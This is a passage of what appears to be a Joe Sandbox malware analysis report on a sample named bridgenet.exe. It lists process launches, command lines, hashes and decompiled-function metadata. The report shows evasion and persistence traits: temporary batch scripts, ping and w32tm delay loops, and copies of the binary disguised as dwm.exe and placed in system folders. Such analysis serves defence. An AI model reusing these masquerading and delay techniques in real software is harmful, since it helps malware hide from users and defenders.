Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:33:41
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:33:41
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:33:41
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:33:41
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6fab70000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:33:43
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0x330000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:33:46
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:33:46
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff67a4c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:33:46
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:33:46
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7bf000000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:33:47
Start date:	13/01/2025
Path:	C:\Program Files\Internet Explorer\images\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Internet Explorer\images\dwm.exe"
Imagebase:	0xf0000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:33:49
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:33:49
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:33:49
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:33:49
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7bf000000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:33:51
Start date:	13/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7917b0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:33:51
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:33:52
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xc30000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:33:54
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:33:54
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff73df00000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:33:55
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:33:55
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6b7fd0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:33:55
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0xf70000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:33:56
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0x3d0000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:33:59
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:33:59
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:33:59
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	07:33:59
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6b7fd0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:33:59
Start date:	13/01/2025
Path:	C:\Program Files\Internet Explorer\images\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Internet Explorer\images\dwm.exe"
Imagebase:	0xf40000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:34:01
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0x320000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	07:34:04
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xb00000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	07:34:04
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0xc80000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	07:34:13
Start date:	13/01/2025
Path:	C:\Program Files\Internet Explorer\images\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Internet Explorer\images\dwm.exe"
Imagebase:	0x940000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	07:34:16
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	07:34:17
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	07:34:24
Start date:	13/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887DA0D48 Relevance: 6.5, Strings: 5, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF887DA0EC5
r6B, xrefs: 00007FF887DA0EA7
5X_H, xrefs: 00007FF887DA0DF3
"9B, xrefs: 00007FF887DA0DD1
b4B, xrefs: 00007FF887DA0F17

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID: "9B$5X_H$b4B$r6B$r6B
API String ID: 0-214251217
Opcode ID: 401ba7ae44612662c9513ca26fe8c8bcb55ee7126350d6ca8e63f1519cf45aab
Instruction ID: f5504fa6076cf942f5f2398907b03fcc911dd1d704081bf9f7173c9f0dd87d79
Opcode Fuzzy Hash: 401ba7ae44612662c9513ca26fe8c8bcb55ee7126350d6ca8e63f1519cf45aab
Instruction Fuzzy Hash: FA81E071D18A8E8FE788DB68C8657AC7BF1FBA6341F4001BAC01AD72D6DB781410C741

Function 00007FF887DA0E43 Relevance: 3.9, Strings: 3, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF887DA0EC5
r6B, xrefs: 00007FF887DA0EA7
b4B, xrefs: 00007FF887DA0F17

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: fe244344435ef2381f2e959b208b4c626c2e4e9e5e10e65a700426b5e1c00dca
Instruction ID: 7e4de4952d74d6e26d310f380c9d8d238083817bc5d66be0d6aae9e928089227
Opcode Fuzzy Hash: fe244344435ef2381f2e959b208b4c626c2e4e9e5e10e65a700426b5e1c00dca
Instruction Fuzzy Hash: 7151CE75918A8E8EE788DF58C8693BD7BF0FB9A755F4041AAC00AD32D6CBB91411C741

Function 00007FF8881413A1 Relevance: 1.8, APIs: 1, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FF888141551

Memory Dump Source

Source File: 00000000.00000002.1403217252.00007FF888140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff888140000_bridgenet.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: e0d365d29e8869c508396c8e64566a7e6d1ca76cdfbb9206d5483ae98dee30f4
Instruction ID: a2f05666f2a0806e43b9219c643b98a870e60955d1674f1ab7b8822d958ae128
Opcode Fuzzy Hash: e0d365d29e8869c508396c8e64566a7e6d1ca76cdfbb9206d5483ae98dee30f4
Instruction Fuzzy Hash: 1D81AE30508A8C8FDB68DF28D8557F97BE1FB59311F04426EE84EC7292CB74A841CB81

Function 00007FF887DA08D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b5d1ee7b7855c4eb8ed498b16082c302fe175b8c2be696fffa965cdcb5f07f
Instruction ID: 0a88b5bf3bc85065fae7fa2120fc09d889787c66a4f609ae6c8cff9f4ed588ab
Opcode Fuzzy Hash: a8b5d1ee7b7855c4eb8ed498b16082c302fe175b8c2be696fffa965cdcb5f07f
Instruction Fuzzy Hash: 06414922E4C55A4EE205B7ECB0963FDB7D0FF863A5B0442BBD05EC7197DD1CA9428285

Function 00007FF887DA3B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b720a9c51542d0ec50c76e4acf6cdd0817ec1c4aadcbbca1b1a51eb76035a87
Instruction ID: 6e2b54e613a1e9aba8b72353a5d82715c312ceba48b1fbd4c85c5527b28b73ff
Opcode Fuzzy Hash: 2b720a9c51542d0ec50c76e4acf6cdd0817ec1c4aadcbbca1b1a51eb76035a87
Instruction Fuzzy Hash: C4312131E489094FEBA4EA28C9547BDB2E3FF98350F5542B5D01FD3195EE28A941C740

Function 00007FF887DA0998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e400252233ccf8e35e38fcd5cfa8e292e1f320de62a80671bed04ddded53dfcb
Instruction ID: bbb103fe0543878b50d8f863cc05a97221a2f76623a4d798fbdd3dc13eb92dd1
Opcode Fuzzy Hash: e400252233ccf8e35e38fcd5cfa8e292e1f320de62a80671bed04ddded53dfcb
Instruction Fuzzy Hash: FD212920B5C91D0FE788F66C945A77DB2D2FB98795F0042BAE40EC32D7DD289C018281

Function 00007FF887DA0C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c0892b7667e540fd81991ef004e15ed5bb1d8f5ea3cb27716dc98d9cde8e18
Instruction ID: 436985668b5b70a71fc46ffcf061b1dee3fd60b4be9cb5bac6e70e6f05cd5f3a
Opcode Fuzzy Hash: 91c0892b7667e540fd81991ef004e15ed5bb1d8f5ea3cb27716dc98d9cde8e18
Instruction Fuzzy Hash: 58212C36E4C6498EE702A7A899460EC7B70FF423A5F0442B3D05A8B1D7E9386647C791

Function 00007FF887DA0C38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25dd39cc412bd40637208dfb1623ac7b3057824ae4d4cc659daa6912b03ca328
Instruction ID: 214b3b1dca2ca0347fe155f8d4d2b4b9948800a92f752c7fa07c75d3bcc3da8d
Opcode Fuzzy Hash: 25dd39cc412bd40637208dfb1623ac7b3057824ae4d4cc659daa6912b03ca328
Instruction Fuzzy Hash: AE11C235A4C6898FE702DB788A551ACBFB0FF42390F1846B7C056DB296F938564AC781

Function 00007FF887DA0C40 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ab11ce84b0ae478094f0b10c7b5d4b496679458328c881f68e9cb62b6023b7
Instruction ID: 5145e19b1867beff0b4349a3f5b9e3764c3d2e51997a0a75854a020cd2e7a436
Opcode Fuzzy Hash: 99ab11ce84b0ae478094f0b10c7b5d4b496679458328c881f68e9cb62b6023b7
Instruction Fuzzy Hash: 4511C435A4C6898FE702DB74C95519CBFB0FF42350F1846F7C056DB296E938564AC781

Function 00007FF887DA417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b668256e04cd21da1605dfad6c9f618c1473c41d78843fe6910cfaf4494efafb
Instruction ID: 10987eee8fc310aaf7be4fa320713e6d9d7eaff9e0596b93eebf7f4ae43a73b1
Opcode Fuzzy Hash: b668256e04cd21da1605dfad6c9f618c1473c41d78843fe6910cfaf4494efafb
Instruction Fuzzy Hash: 93014C30A48A198FDB84EB08C594EBDB3F1FB69344F1442A9C40FD32A5CE34A944CF82

Function 00007FF887DA0C48 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c49f180de6ff49300e75f89ba4978ca486e15134c2ac2594e71202cf23d3645
Instruction ID: 94c5e46a3f4e1a5f1e0dc1fd3f4d21e3ef756fbdeca6dda17e92151929803e53
Opcode Fuzzy Hash: 8c49f180de6ff49300e75f89ba4978ca486e15134c2ac2594e71202cf23d3645
Instruction Fuzzy Hash: 8D019E3594D2898FE702DB74C98419CBFB0FF42354F1846E7C056DB2AAE938AA45C781

Function 00007FF887DA0C50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c42b4520cd71b6665c15453a19e3eaa88129cc6bc123ff3412e1312a21053b
Instruction ID: 1fc191698b2cfe74ad46647d8de914edf9c8b1b24cf087025e75bc972ae36887
Opcode Fuzzy Hash: e6c42b4520cd71b6665c15453a19e3eaa88129cc6bc123ff3412e1312a21053b
Instruction Fuzzy Hash: 33018B34D4D3899FE702DB748A941ACBFB0FF02354F1846E6C056DB29AE938AA45C781

Function 00007FF887DA3C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: 43349bf62cffda6465e75ad92beb0562b1091db85e9ea5423c67abdaeb711214
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: 6CF0C931A8991A8EFB64EA14C954BBDB2B2FB54351F1442B9C00FD7199DE386986CA00

Function 00007FF887DA0B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca5554d765699166a84b0d9c9662fbf30b51f56a6d6fdd0d9f27c8f32c34f7e
Instruction ID: 210b4adb59daaec614aa8b881cc73010ed76889e2274450737e1e0f10e5929dd
Opcode Fuzzy Hash: 1ca5554d765699166a84b0d9c9662fbf30b51f56a6d6fdd0d9f27c8f32c34f7e
Instruction Fuzzy Hash: 1AE061365599448FC741DF78DCA50E47B50FF4220875612FEC049D7172D321556EC740

Function 00007FF887DA403D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c24b22e79fae4fd83d6c00dfdc5c19a5e6d78216d8f3affec80e6508e77a9f
Instruction ID: 1b62f20d79b5cdad60312711aef0b4cb6ef793b09d47086257a1b170db2ed8bf
Opcode Fuzzy Hash: 21c24b22e79fae4fd83d6c00dfdc5c19a5e6d78216d8f3affec80e6508e77a9f
Instruction Fuzzy Hash: C7F01C21E9842A8EF258A664C55837CA2A2BF85344F640374D02FC22DADE286980C641

Function 00007FF887DA6D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1400036989.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887da0000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: d2279f9a4146773dcfec68a38a787f113da403b6ad429278f216a8877ff5b22d
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
